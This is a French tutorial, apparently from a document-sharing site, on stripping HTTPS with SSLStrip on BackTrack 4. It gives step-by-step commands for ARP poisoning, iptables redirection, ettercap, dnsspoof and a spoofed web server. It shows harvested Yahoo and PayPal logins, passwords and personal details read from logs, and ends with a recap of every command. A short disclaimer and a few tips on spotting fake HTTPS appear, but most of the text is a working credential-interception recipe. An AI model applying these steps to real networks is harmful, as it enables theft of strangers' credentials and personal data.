BONNE SÉANCE. TUTO SSLSTRIP sous BT4 Final & Bonus. ARP Poisoning + DNS Spoof + httpd
|
|
- Yvonne Samson
- il y a 8 ans
- Total affichages :
Transcription
1 1.Pour rappel, il est interdit de tester un réseau sans l accord de son propriétaire! 2.Pour le bon déroulement de ce tuto, il est aussi interdit de fumer, de filmer dans la salle, ou de faire un appel à un ami. BONNE SÉANCE TUTO SSLSTRIP sous BT4 Final & Bonus. ARP Poisoning + DNS Spoof + httpd crack-wpa.fr
2 TABLE DES MATIERES 1. INTRODUCTION. I. Préface II. Prérequis III. Intro SSLStrip.a Https et SLL: quelques explications.b SSLStrip: la naissance de l outils.c Comment on arrive sur du Https IV. Intro Arp Poisoning - Dns Spoof - httpd 2. SSLSTRIP LE CONTACT. I. SLStrip à quoi ça ressemble? II. Avant on se prépare! III. Configuration IV. SSLStrip en Pratique 1 er Test sans SSLStrip 2 eme Test avec SSLStrip V. Les Logs 3. ARP POISONING - DNS SPOOF - HTTD. I. Mini Intro II. Les Etapes 4. RÉCAP DES COMMANDES. I. SSLStrip II. Arp Poisoning - Dns Spoof - httpd I. Préface 1. INTRODUCTION. Pour commencer, ce tuto fait suite à une série dont voici le 1 er épisode Mdk3 by Antares145, bien entendu ce lien est juste là à titre indicatif et donc pas nécessaire à la compréhension de ce tuto.. Dans un souci de pédagogie purement ludique, je force volontairement sur le coté animation et je précise encore une fois que ces tutos doivent être ouvert au plus grand nombre. Bienvenue aux N00b z.. Il n a rien d exceptionnel en soi c est juste une compilation de donnés déjà existantes, dixit le tuto SSLStrip de M1ck3y sur BT3. A quelques broutilles près, sur BT4 Final c est la même chose.. Certes pour les puristes et les habitués, pas besoin de toute cette mise en scène et de tout ce verbiage, vous pouvez donc accéder directement à la section 4. dans la Table des Matières. Pour les N00b z, la visite continue... Onjoy! II. Prérequis. Tutoriel réalisé sous BackTrack 4 final.. Une Maj de SSLStrip (facultatif, mais c est toujours mieux d avoir la dernière version). Les tests ont été effectués avec un adaptateur wifi usb Alfa AWUS036H 1000 mw. crack-wpa.fr
3 III. Intro SSLStrip. A travers ce tutoriel, nous allons voir comment il est possible de s'attaquer à une connexion encryptée (SSL) grâce à SSLStrip qui va rediriger tout le trafic https vers du http en donnant l'illusion à la victime qu'elle est bien sur une connexion sécurisée..a/ Https et SSL: quelques explications. HTTPS pour (hyper text transfert protocol secured). Il est synonyme de connexion sécurisée et permet d'encrypter des données sensibles afin d'éviter une éventuelle interception des données, exemple les sites web bancaires. Grace à un système de certificats, le navigateur va pouvoir s'assurer que le site web auquel il est connecté est bien celui qu'il prétend être. Un tiers de confiance est utilisé pour cela, on l'appelle le CA (certificate authority). Pour résumer, c'est en comparant le certificat du site sur lequel il est connecté et le certificat du CA (le tiers de confiance) que le navigateur va s'assurer qu'il est bien connecté à un site sécurisé. Le http classique utilise le port 80. Le https utilise par défaut le port 443 Une fois connecté en https, les informations qui vont transiter entre le navigateur et le serveur web seront encryptées via SSL (secured socket layer), un protocole de cryptage très sur permettant de sécuriser les données..b/ SSLStrip: la naissance de l'outil. SSLStrip est un outil développé par Moxie Marlinspike, il est né d'un constat simple: La majorité des utilisateurs ne regardent pas l'url affichée dans la barre d'adresse de leur navigateur, et quand il leur apparait un message d'erreur la plupart du temps ils clickent sur ok sans savoir ce qu'ils font.. Les utilisateurs se fient à une impression, un sentiment, un ressenti basé sur ce qu'ils voient: - des indicateurs qui disent que la page est sécurisée - des icones avec un cadenas qui apparaissent ici ou là - la barre d'adresse qui change de couleur Lorsque ces éléments sont réunis, l'utilisateur pense que la page est sécurisée (et franchement quel lambda analyserait chaque page qu il visite?). crack-wpa.fr
4 Donc quand on veut s'attaquer à du https, on fait en sorte de maintenir la confiance de l utilisateur, et surtout de ne pas éveiller sa suspicion en affichant un message d'alerte disant que le certificat n'a pas été émis par une autorité approuvée ou autres messages qui pourraient paraitre anormale. En résumé, pour duper l'utilisateur il ne faut pas lui afficher de messages d'alerte, et le maintenir dans un environnement visuel qui va lui laisser penser qu'il est sur un site sécurisé. Voici un schéma basique qui illustre son fonctionnement:.c/ Comment les utilisateurs arrivent ils sur du https?. Très peu de personnes tapent directement https dans leur barre d'adresse, en fait les 2 façons classiques pour arriver sur du https lors d une navigation sur le web, sont : - en clickant sur un lien - en suivant une redirection (302). En effet, la plupart des sites proposant un contenu sécurisé en https, nous font dans un premier temps passer par une page http (exemple: la page accueil) avant d'être redirigé vers une page sécurisée. C'est le cas sur les sites bancaires, sur google mail, paypal etc.... SSLStrip ne va pas attaquer le https, il va attaquer le http. Il va transformer tous les liens https sur le poste victime en liens http, et garder en mémoire tout ce qui a changé en créant une map (carte). Résultat: - le serveur ne voit rien, pour lui la connexion est toujours encryptée - le client ne voit aucun message d'alerte dans son navigateur - l'attaquant peut sniffer toutes les données car elles transitent en clair. Grace à ce procédé, il est très difficile de différencier la véritable page https cryptée via SSL de la fausse page http renvoyée par SSLStrip.. Cela dit, comme on l'a évoqué, les utilisateurs sont habitués à voir une image de cadenas lorsqu'ils basculent sur une page sécurisée, cette icone représente à leurs yeux un gage de sécurité. SSLStrip va donc falsifier les réponses aux requêtes favicon du navigateur et afficher en guise de favicon un petit cadenas (une favicon est la petite image située à gauche de la barre d'adresse du navigateur) : crack-wpa.fr
5 Le Petit Bonus! IV. Intro ARP Poisoning + DNS Spoof + HTTPD Est-ce une obligation après SSLStrip? Obligation Bien sûr que non, tous deux ont une mission bien distincte et bien différente, l un comme l autre peuvent être utilisés séparément, mais on verra qu ils ont en commun la méthode MITM. Dans ce cas pourquoi son utilité? Utilité Juste pour le coté ludique du challenge (cad : mettre une page de pwn). Pour voir les similitudes MITM sur une autre technique qu SSLStrip. Pour la culture générale. ( Et aussi, parce que j en ai envie, et que j fais s que j veux!) Vu que c est un petit Bonus, on ne va pas faire de tuto détaillé sur ce sujet, mais dans le cadre de notre "attaque" on va juste en expliquer vite fait le principe et s axé plus précisément sur la mise en place du dispositif. Voici un schéma classique de connexion, un pc connecté en wifi sur un routeur pour surfer sur le web La Mission : Notre but est de se glisser subrepticement dans le réseau afin de récupérer le trafic et de rediriger la victime sur une page "pwnd" ou "piégée" via notre server httpd. La Technique du MITM (Man in the Middle) : Et pour ce faire on va appliquer la méthode du MITM, c'est-à-dire qu on va se placer entre la Victime et le point d accès Mais pour l instant on ne parlera que du principe, la méthode sera pour plus tard. ARP et ARP Poisoning : Ici un très bon explicatif sur l ARP et ARP Poisoning, mais grosso modo ce qui faut retenir dans notre cas c est que l'arp Poisoning va nous permettre de faire admettre légitimement notre MITM. (La Victime passe par notre machine en pensant que c est le routeur et inversement contrairement proportionnel de même avec le routeur Bref j espère que j ai été assez clair) crack-wpa.fr
6 Le DNS Spoof : Dans notre cas de figure il servira à faire croire à la Victime qu'il se trouve sur un site internet original, alors qu'il sera en réalité redirigé sur notre machine MITM et donc notre server. Le rôle du Server HTTPD : Une fois que notre dispositif de redirection est mis en place on va pouvoir faire en sorte que la Victime visite notre page "pwnd" ou piégée "métasploit ¹" via notre serveur, d où son utilité. On pourrait éventuellement ne pas s en servir mais le but n est pas de faire juste de la simple redirection d url. ¹ Bref, on s est compris Donc pour notre challenge ça sera juste une page "pwnd", dsl. Maintenant qu on en sait un peu plus, revenons a notre aventure! Previously in MIH (Mdk3 by Antares145) crack-wpa.fr
7 2. SSLSTRIP PREMIER CONTACT I. SSLStrip à quoi ça ressemble? Etant donné qu il est déjà installé sur BT4 on va pouvoir faire connaissance avec SslStrip : A. Soit en passant par - Menu K Backtrack Privilege Escalation All SSLStrip Une fenêtre Terminal SSLSTRIP s'ouvre en vous affichant directement toutes les commandes B. Soit en ouvrant une Konsole de la barre des taches en bas à gauche, et on tape : root@bt :~# sslstrip -h crack-wpa.fr
8 II. SSLStrip Préparation du Terrain Maintenant qu'on a fait les présentations, on peut préparer le terrain. Et oui! On n arrive pas comme ça les mains dans les poches. Avant toute chose on se pose les bonnes questions. A. Heuuu C est quoi mon matos? On sait déjà que pour ma part c est un adaptateur wifi Alfa AWUS036H 1000 mw, mais afin d'avoir un peu plus d infos sur le périphérique à utiliser, on fait un petit : root@bt :~# ifconfig Mon alfa se trouve en (wlan0), et on a l'ip ( ) c'est pas important mais bon à savoir. B. Ok! Mais c est qui la victime? un scan avec nmap sur le réseau, histoire de trouver une cible : root@bt :~# nmap /24 Je vous mets directement le résultat : On est presque paré il reste deux, trois bricoles à config et c est parti. crack-wpa.fr
9 III. SSLStrip et Configurations A. Un peu de configuration pour faire de l'arp Poisoning SSL, on va éditer le fichier "etter.conf" d'ettercap...ok mais ou se trouve t'il? pour le savoir voici une manip très simple (parmi tant d'autre) on ouvre un autre Terminal, et on tape : root@bt :~# whereis etter.conf Vous aurez normalement la réponse suivante "etter: /etc/etter.conf" ce qui nous donne le chemin. Afin d'éditer le fichier "etter.conf", ouvrez un autre Terminal et taper : root@bt :~# kate /etc/etter.conf sinon kwrite (autre éditeur de texte), ou nano (édition en console), font aussi l'affaire.! Attention! Pour les étourdis et pour ceux qui ne le savent pas, si vous ouvrez un terminal SSLStrip via Menu K Backtrack Privilege Escalation All SSLStrip, dans ce cas là ne lancez pas de commande "kate" ou "kwrite" dans le même Terminal qu SSLStrip, sauf si vous éditez avec "nano", car vous aurez l'erreur suivante : crack-wpa.fr
10 Le fichier "etter.conf" ouvert, allez dans la section "Linux -> if you use iptables" Enlevez le dièse '#' devant : et redir_command_on à la ligne 168 redir_command_off à la ligne 169 Enregistrez et sortez. crack-wpa.fr
11 B. On active l Ip Forwarding et on lance le MITM. L'Ip forwarding permet de faire transiter des paquets d'une interface réseau à une autre. Pour activer l'ip forwarding, il faut ajouter la valeur 1 au fichier /proc/sys/net/ipv4/ip_forward (cette valeur par défaut est à 0 ce qui signifie que l'ip forwarding n'est pas activé). tapez : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward et on lance l'arp Poisoning qui nous placera en situation de man in the middle sur le réseau : root@bt :~# arpspoof -i wlan0 -t i pour indiquer l interface, donc wlan0 -t "target" pour indiquer la cible, donc Suivi de l host, donc dans ce cas l AP Arpsoof en action C. La redirection du trafic avec iptables. Allez zou!.. Un peu de devoirs à faire a la maison Comprendre l iptables et en ce qui nous concerne la Cible REDIRECT dans une nouvelle fenêtre Terminal, tapez : root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports ou par exemple vous pouvez configurer un port différent, ex : crack-wpa.fr
12 IV. SSLStrip en pratique: test avec & sans SSLStrip Prenons comme exemple la page login mail de Yahoo.com crack-wpa.fr
13 1er test / sans SSLstrip On lance à la suite d iptables la commande ettercap: root@bt :~# ettercap -T -q -i wlan0 -T = lance ettercap en mode texte / -q = mode silence, pour pas se taper les requêtes dans le Terminal / -i = pour signifier une interface + (mon interface = wlan0) Et on vérifie ce qui se passe dans l'explorateur de notre cible, en retournant sur la page de login mail Yahoo.com Alllaaarrrmmmeeee!!! La plupart des outils permettant d'effectuer une attaque man in the middle sur du SSL (https) fournissent au navigateur de la machine victime un faux certificat SSL n'ayant pas été émis pour le site visité. Le résultat est un message d'alerte dont voici deux exemples: Avec Firefox : crack-wpa.fr
14 Avec IE : On arrêter proprement l'attaque, il faut appuyer sur la touche " q " ( pas besoin de filtre parental, ce n est qu une touche sur un clavier) 2ème test / avec SSLstrip crack-wpa.fr
15 (Inutile d ouvrir un autre Terminal). Cette fois ci on lance la commande sslstrip: root@bt :~# sslstrip -a -k -f! NOTE! On a bien mis nos options : -a pour logger toute les requêtes SSL et http / -k pour la session / -f pour le favicon Pourquoi ne pas ajouter -l? - Pour la simple raison qu sslstrip écoute déjà par défaut le port Petit rappel du 2.III.C, on a configuré la redirection du trafic iptables sur le port 10000, par contre si on l avait configuré sur le port 15000, on aurait la commande suivante : root@bt :~# sslstrip -a -k -f -l Vous remarquerez qu en lançant cette commande un fichier sslstrip.log a été créé sur le bureau. Maintenant qu SSLStrip est lancé, on re-test la commande ettercap, on ouvre un autre Terminal: root@bt :~# ettercap -T -q -i wlan0 crack-wpa.fr
16 Et tous le monde fait Wouaaa!!! Retournons voir notre cible Et là! C est le bonheur et la stupéfaction car devant vos yeux ébahis et émerveillés vous contemplez enfin toute la magie d SSLStrip. Test avec Firefox : Login : dr.dernfer@yahoo.fr Pass : ************ crack-wpa.fr
17 Bien venu sur l interface web mail du Dr.Denfer Test avec IE : Pour le test on a volontairement mis un pass erroné crack-wpa.fr
18 Résultat : on le connait, mais ce qui est intéressant c est de voir le Terminal ou le fichier sslstrip.log Mais qu est ce qui ce passe de notre coté MITM? Regardons un petit peu notre terminal A. Ici l ip est c elle de la page de login de Yahoo mail via Firefox (voir screen plus haut) sur lequel on a essayé de logger avec : l adresse dr.denfer@yahoo.fr et le pass Austin.Power B. Ici c est la même ip donc même page mais via IE, avec un pass erroné pour l exemple : l adresse dr.denfer@yahoo.fr et le pass minimoi Testé avec Firefox et IE sur un compte Yahoo Et pourquoi pas sur un compte Paypal? (Voir même lors de la création du compte, les infos qui transpirent pourrait bien nous surprendre) crack-wpa.fr
19 Fini je Payplus!. Nous allons maintenant voir ce qu'il se passe avec Paypal... Ouvrir un compte no soucy! Coté MITM ça donne quoi? Bref! C est la fête crack-wpa.fr
20 Toujours aucun message d'alerte, bien au contraire. La victime va se connecter à son Paypal. Il arrive sur la page d'accueil, en L'utilisateur clique sur le bouton "Connectez-vous", c'est là qu'il devrait normalement être redirigé vers du https. Ici, on peut voir que la favicon représentant le cadenas est déjà affichée dans la barre d'adresse, et on pourrait donc se croire sur un site sécurisé. Voici la page de login: crack-wpa.fr
21 . La différence se situe au niveau de la barre d'adresse de l explorateur. La vraie page sécurisée affiche une adresse en https et la partie gauche de la barre devient verte (pour Paypal), en affichant le nom du propriétaire du certificat SSL.. Par contre sur la page "stripped" ou "leurre", l'adresse est en http classique, et on peut voir un cadenas sur la gauche (ce n'est bien sur en réalité qu'une favicon, mais combien de personnes savent ce qu'est une favicon, et surtout combien de personnes sont suffisamment attentives pour remarquer ce genre de petit détail, en plus, jusqu'ici aucun message d'alerte n'a été affiché!). Notre cible continue à surfer, il valide son identifiant ainsi que son mot de passe et se retrouve donc en toute logique connecté à son compte Paypal.. Dans un autre exemple il se peut aussi que vous arriviez sur une page de login http (ex 1 : hotmail), et de voir le https agir après que les identifiants soient validés : 2, (on voit un affichage du https d une fraction de seconde avant la redirection sur le compte : 3). Petit Récap. pour mieux ce prémunir Il faut donc dans la majorité des cas : vérifier l adresse (donc https), de vérifier si ce n est pas un Favicon bidon (souvent c est le logo du site en question), que la barre qui précède l url soit une zone colorée (vert, bleu...) crack-wpa.fr
22 V. Les Logs Ok on à les login/pass de comptes sur des sites qui sont censé être sécurisés Et c est tout? Oullllaaa une septique! Je vois que tu es une coquine toi et que tu en veux encore plus. Dans un moment de grande mansuétude on va rajouter un tout p tit bonus, mais juste parce que c est toi. Ce coup ci ça ne concerne plus le Terminal, mais les logs. Un mail rien de plus anodin, exemple : Pendant le MITM un mail à été reçu " et alors moi aussi je reçois des mail, c est quoi le rapport?", (Pour aller plus vite j ai ciblé ma recherche, sinon lors d une recherche à l aveugle on ce tape une bonne partie du log à lire). crack-wpa.fr
23 En ouvrant le fichier de sslstrip.log, on peut trouver ceci : On fait tous un autre Wouaaaouu!!! Ça marche aussi avec Haaannn!!! crack-wpa.fr
24 C est-y pas mignon tout ça J en ai la larme à l œil. Toujours pas convaincu? Vous vous rappelez certainement de la création du compte Paypal (voir screen plus haut), et si on jetait aussi un coup d œil sur les logs? SECURE POST Data ( Bref on aura compris d où ça vien! =dr.denfer%40yahoo.fr password=anstin.power donc j en déduit que le login est dr.denfer@yahoo.fr pass Austin.Power crack-wpa.fr
25 Jusque là pas de quoi sauter au plafond on avait déjà ces infos dans le Terminal, mais si en plus on avait des infos perso sans se connecter sur le compte Paypal ;) first_name=dr&last_name=denfer adresse1=rue+du+paradis zip=75000 city=denferisland PhoneNumber= Dr Denfer Rue du Paradis code postal la ville le numéro de téléphone quand on le spécifie Conclusion : On retrouve le login de l'utilisateur, le mot de passe (%40 est l'encodage ascii le nom, prénom, adresse complète, numéro de téléphone. Dans une transparence quasi parfaite... Ce tutoriel illustre une fois de plus le danger des attaques man in the middle, j'espère qu'il attirera votre attention sur le fait qu'il est extrêmement dangereux de se connecter à un réseau "unsecured", qu'il s'agisse d'un hotspot ou autre. Si vous n'êtes pas sure à 100% du réseau sur lequel vous êtes connecté, alors ne vous connectez pas à des sites sensibles, n'envoyez aucune donnée importante et surtout soyez toujours vigilant lorsque vous vous connectez à un site sécurisé, la barre d'adresse doit clairement indiquer https et non http. 3. BONUS ARP POISONING - DNS SPOOF - HTTD I. Ici nous allons voir la mise en place du dispositif, mais si vous le faites dans la continuité d SSLStrip sachez adapter vos étapes (ex : Si cela avait déjà été fait depuis le début, ça ne sert à rien de refaire un ifconfig, nmap, etc ). Mais pour le principe j explique la méthode depuis le début. crack-wpa.fr
26 II. C est parti mon kaïkaï! A. On identifie la carte qui est connectée au net, ex : wlan0 : root@bt :~# ifconfig B. On scan le réseau avec Nmap dans une Konsole, dans notre cas: root@bt :~# nmap /24 Résultat l ip cible est Toujours pareil C. On lance "DSniff" dans - Menu K Backtrack Privilege Escalation All DSniff Un Terminal s'ouvre et vous avez directement les commandes. crack-wpa.fr
27 D. On lance l'ip forward dans le Terminal: :~# echo 1 > /proc/sys/net/ipv4/ip_forward E. on va ouvrir un autre onglet: arpspoof -i interface -t IP-Victim IP-Routeur -i + interface = signifie l interface à utiliser -t = target/cible + ip-victime + ip-point d accès Et on tape: root@bt :~# arpspoof -i wlan0 -t F. On ouvre encore un autre onglet dans la console et on tape le contraire: arpspoof -i interface -t IP-Routeur IP-Victim Donc: root@bt :~# arpspoof -i wlan0 -t crack-wpa.fr
28 G. On crée sur le bureau un fichier "ex : redirection.host" et on y met les infos de redirection, ex: google.fr google. com Ou ex : ( *.*) veut dire quel que soit le site ou ira la victime (bien entendu on parle de la racine de l url), elle sera redirigé vers notre ip, donc quand une victime ira sur google.fr, etc Elle sera automatiquement redirigée vers notre ip H. On ouvre un autre onglet, on tape: root@bt :~# dnsspoof -i wlan0 -f redirection.host I. pour la section serveur on place la page qui sera vu après la redirection, qu'on appellera "index.html", une simple page "pwnd" à mettre dans le dossier "var/www" crack-wpa.fr
29 J. On lance le server HTTPD dans - Menu K Services HTTPD Start HTTPD Et on attend sagement que la cible visite une url de notre fichier redirection.host Comme de par hasard! Server HTTP2-D2! crack-wpa.fr
30 Et si maintenant on allait faire un tour du coté de l explorateur de notre cible? Google.fr Google.com crack-wpa.fr
31 Là par contre si on vérifie le fichier "redirection.host" crack-wpa.fr n en fait pas parti et donc on peut y accéder ( Il manquerait plus que ça!) 4. RÉCAP DES COMMANDES I. SSLStrip - Commandes A. Connaitre son matos : root@bt :~# ifconfig B. Scanner le réseau : root@bt :~# nmap /24 C. Pour l aide : root@bt :~# sslstrip h D. Config etter.conf d ettercap - Trouver : root@bt :~# whereis etter.conf - Ouvrir le fichier : root@bt :~# kate /etc/etter.conf - Allez dans la section "Linux -> if you use iptables", enlevez le dièse '#' devant : et redir_command_on à la ligne 168 redir_command_off à la ligne 169 E. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward F. On lance arpspoof : root@bt :~# arpspoof -i wlan0 -t i pour indiquer l interface, donc wlan0 -t pour indiquer la cible, donc Suivi de l host, donc dans ce cas l AP crack-wpa.fr
32 G. Définir iptables : root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports H. On lance sslstrip : root@bt :~# sslstrip -a -k f -a pour logger toute les requêtes SSL et http -k pour la session -f pour le favicon -l pour le port en écoute 1000 par défaut (si différent, configurez aussi iptables) sslstrip.log fichier de log par défaut sur le bureau (si différent, commande -w) I. On lance Ettercap : root@bt :~# ettercap -T -q -i wlan0 -T = lance ettercap en mode texte -q = mode silence, pour pas se taper les requêtes dans le Terminal -i = pour signifier une interface + (mon interface = wlan0) II. ARP Poisoning - Dns Spoof - HTTPD - Commandes A. Connaitre son matos : root@bt :~# ifconfig B. Scanner le réseau : root@bt :~# nmap /24 C. On lance "DSniff" : Menu K Backtrack Privilege Escalation All DSniff D. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward E. On lance arpsoof : arpspoof -i interface -t IP-Victim IP-Routeur -i pour indiquer l interface, donc wlan0 -t pour indiquer la cible, donc Suivi de l host, donc dans ce cas l AP Et on tape: root@bt :~# arpspoof -i wlan0 -t On ouvre un autre onglet et on inverse : arpspoof -i interface -t IP-Routeur IP-Victim Donc: root@bt :~# arpspoof -i wlan0 -t F. On crée un fichier "ex : redirection.host" et on met les infos de redirection : google.fr google. Com G. On lance dnspoof : root@bt :~# dnsspoof -i wlan0 -f redirection.host H. Pour la section serveur : On place la page qui sera vu après la redirection, qu'on appellera "index.html", une simple page "pwnd" à mettre dans "var/www". I. On lance le server HTTPD : Menu K Services HTTPD Start HTTPD J. That s all! crack-wpa.fr
33 crack-wpa.fr
Accès distant Freebox v6 Configuration
2014 Accès distant Freebox v6 Configuration Micrologiciel Freebox version 2.0.7 Stéphane Corny V 3.1 11/02/2014 Table des matières 1. Préparation de la Freebox depuis le PC (en local)... 2 2. Configuration
Plus en détailVirtualBox : Installation de Backtrack-4 en machine virtuelle TABLE DES MATIÈRES. I. Préface. II. Prérequis 1. INTRODUCTION
VirtualBox : Installation de Backtrack-4 en machine virtuelle TABLE DES MATIÈRES 1. INTRODUCTION. I. Préface II. Prérequis 2. INSTALLATION. I. Création de la VM II. Lancement et Install de BackTrack-4
Plus en détailVoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3)
VoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3) Table des matières: 1. Présentation de l atelier... 2 2. Présentation
Plus en détailInternet : Naviguer en toute sérénité
Internet 01 Mozilla Firefox Internet : Naviguer en toute sérénité Tutoriel Pratique 2 : «Internet : naviguer en toute sérénité» Durée de la séance : 2h tout public prérequis : - Connaître et utiliser les
Plus en détailEtape 1 : Connexion de l antenne WiFi et mise en route
Guide de Configuration Rapide Bullet et Picostation Introduction Ce guide s adresse au plaisancier qui navigue de port en port, donc en mobilité, souhaitant pouvoir se connecter à un point d accès Wifi
Plus en détailService de certificat
Service de certificat Table des matières 1 Introduction...2 2 Mise en place d une autorité de certification...3 2.1 Introduction...3 2.2 Installer le service de certificat...4 3 Sécuriser un site web avec
Plus en détailConfigurer ma Livebox Pro pour utiliser un serveur VPN
Solution à la mise en place d un vpn Configurer ma Livebox Pro pour utiliser un serveur VPN Introduction : Le VPN, de l'anglais Virtual Private Network, est une technologie de Réseau Privé Virtuel. Elle
Plus en détailMicrosoft Hosted Exchange 2010 DOCUMENT D EXPLOITATION
Microsoft Hosted Exchange 2010 DOCUMENT D EXPLOITATION SOMMAIRE ACCES EX10... 3 CONFIGURATION EX10 A. Entrées DNS à créer sur le(s) nom(s) de domaine choisi(s)... 3 B. Configuration Outlook 2007 - MAPI...
Plus en détailCapture, Filtrage et Analyse de trames ETHERNET avec le logiciel Wireshark. Etape 1 : Lancement des machines virtuelles VMWARE et de Wireshark
Capture, Filtrage et Analyse de trames ETHERNET avec le logiciel Wireshark Wireshark est un programme informatique libre de droit, qui permet de capturer et d analyser les trames d information qui transitent
Plus en détailNavigation dans Windows
Cours 03 Navigation dans Windows Comme je le disais en introduction, notre souris se révèle plus maligne qu'elle n'en a l'air. À tel point qu'il faut apprendre à la dompter (mais c'est très simple, ce
Plus en détailRéaliser un accès distant sur un enregistreur DVR
Réaliser un accès distant sur un enregistreur DVR La mise en place d un accès distant permet de visualiser le flux des caméras depuis n importe quel endroit du monde à la seule condition de disposer d
Plus en détailDécouvrir et bien régler Avast! 7
Découvrir et bien régler Avast! 7 Avast 7 est disponible en libre téléchargement. Voici, en images, tout ce qu'il faut savoir pour maîtriser les nouveautés de cette édition qui s'annonce encore plus efficace
Plus en détailBut de cette présentation. Proxy filtrant avec Squid et SquidGuard. Serveur proxy. Serveur proxy. Hainaut P. 2013 - www.coursonline.
Proxy filtrant avec Squid et SquidGuard But de cette présentation Présenter le serveur proxy, son utilité et sa mise en œuvre Ce type de serveur est très utilisé en entreprise Il est donc important d en
Plus en détailSQUID Configuration et administration d un proxy
SQUID Configuration et administration d un proxy L'objectif de ce TP est d'étudier la configuration d'un serveur mandataire (appelé "proxy" en anglais) ainsi que le filtrage des accès à travers l'outil
Plus en détailSECURITE DES S.I. Benjamin BAURY Yann BECOURT Aymen BEN HASSINE Thomas BONNET Guillaume COMET Ramatoulaye DIALLO Alexandre DUBOSC
Benjamin BAURY Yann BECOURT Aymen BEN HASSINE Thomas BONNET Guillaume COMET Ramatoulaye DIALLO Alexandre DUBOSC Gérémy GIULY Anaël JALLET Gaël JUIN Adil NOUA Mickaël POL Bastien TOMAS Thomas VIVIEN Master
Plus en détailCONTACT EXPRESS 2011 ASPIRATEUR D EMAILS
CONTACT EXPRESS 2011 ASPIRATEUR D EMAILS MANUEL D UTILISATION Logiciel édité par la société I. PREAMBULE a) Avant propos... 3 b) Support... 3 c) Interface d accueil... 4 à 5 d) Interface de Recherche...
Plus en détailBut de cette présentation
Réseaux poste à poste ou égal à égal (peer to peer) sous Windows But de cette présentation Vous permettre de configurer un petit réseau domestique (ou de tpe), sans serveur dédié, sous Windows (c est prévu
Plus en détailTAGREROUT Seyf Allah TMRIM
TAGREROUT Seyf Allah TMRIM Projet Isa server 2006 Installation et configuration d Isa d server 2006 : Installation d Isa Isa server 2006 Activation des Pings Ping NAT Redirection DNS Proxy (cache, visualisation
Plus en détailL accès à distance du serveur
Chapitre 11 L accès à distance du serveur Accéder à votre serveur et aux ordinateurs de votre réseau depuis Internet, permettre à vos amis ou à votre famille de regarder vos dernières photos, écouter vos
Plus en détailacpro SEN TR firewall IPTABLES
B version acpro SEN TR firewall IPTABLES du 17/01/2009 Installation du routeur firewall iptables Nom : Prénom : Classe : Date : Appréciation : Note : Objectifs : - Être capable d'installer le service de
Plus en détailL informatique au collège Willy Ronis de Champigny sur Marne
L informatique au collège Willy Ronis de Champigny sur Marne Collège Willy Ronis Champigny sur Marne 1 Sommaire Sommaire 1. Le serveur Scribe... 3 1.1 Qu est ce que Scribe?... 3 1.2 Comment se connecter
Plus en détailUniversité Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Master IC²A. TP réseau firewall
Université Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Master IC²A TP réseau firewall L objectif de ce TP est de comprendre comment mettre en place un routeur pare-feu (firewall) entre
Plus en détailProcédure d utilisation et de paramétrage (filtrage) avec IPFIRE
Procédure d utilisation et de paramétrage (filtrage) avec IPFIRE Par AVIGNON Bastien et CHOMILIER Tom V2.0 Sommaire : (Sommaire interactif) I) Introduction... 2 II) Mettre en place une black liste sur
Plus en détailUltraVNC, UltraVNC SC réglages et configurations
UltraVNC, UltraVNC SC réglages et configurations UltraVNC Serveur (réglages des paramètres d administration du module Serveur) L option «Accepte les connexions» est validée par défaut et toutes les autres
Plus en détailAssistance à distance sous Windows
Bureau à distance Assistance à distance sous Windows Le bureau à distance est la meilleure solution pour prendre le contrôle à distance de son PC à la maison depuis son PC au bureau, ou inversement. Mais
Plus en détailA la découverte d'internet Explorer 8
A la découverte d'internet Explorer 8 A la découverte d'internet Explorer 8 Le respect des standards La compatibilité avec Internet Explorer 7 Les accélérateurs Les Web Slices La restauration de sessions
Plus en détailProxy et reverse proxy. Serveurs mandataires et relais inverses
Serveurs mandataires et relais inverses Qu'est-ce qu'un proxy? Proxy = mandataire (traduction) Un proxy est un service mandataire pour une application donnée. C'est à dire qu'il sert d'intermédiaire dans
Plus en détailSécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Plus en détailContrôle Parental Numericable. Guide d installation et d utilisation
Contrôle Parental Numericable Guide d installation et d utilisation Version 12.3 pour OS X Copyright 2012 Xooloo. Tous droits réservés. Table des matières 1. Introduction Dénomination et caractéristiques
Plus en détailVIDÉOSURVEILLANCE. Procédures de paramétrage des différentes box du marché
VIDÉOSURVEILLANCE Procédures de paramétrage des différentes box du marché Sommaire Paramétrage de l enregistreur sur le moniteur p. -8 Paramétrage de la Neufbox p. 9- Paramétrage de la Livebox p. -7 Paramétrage
Plus en détailCréation d un compte No-IP et configuration
Création d un compte No-IP et configuration Introduction Ce document s adresse aux utilisateurs de box ADSL qui ont une politique d adresse IP externe dynamique. Si votre adresse IP change régulièrement
Plus en détailGUIDE D UTILISATION ADSL ASSISTANCE
GUIDE D UTILISATION ADSL ASSISTANCE Sommaire I. Vérifications à faire avant d entamer les étapes de diagnostic complexe II. Les étapes du diagnostic après les vérifications A. La synchronisation est KO
Plus en détailConfiguration du WIFI
Configuration du WIFI Cette documentation est disponible sur : http://www.u-picardie.fr/~sam/ 1. Configuration de l'accès au WIFI de l'upjv Pré-requis Appartenir à l'upjv (Etudiants et Enseignants). IUFM,
Plus en détailSYSTEME DE GESTION DES ENERGIES EWTS EMBEDDED WIRELESS TELEMETRY SYSTEM
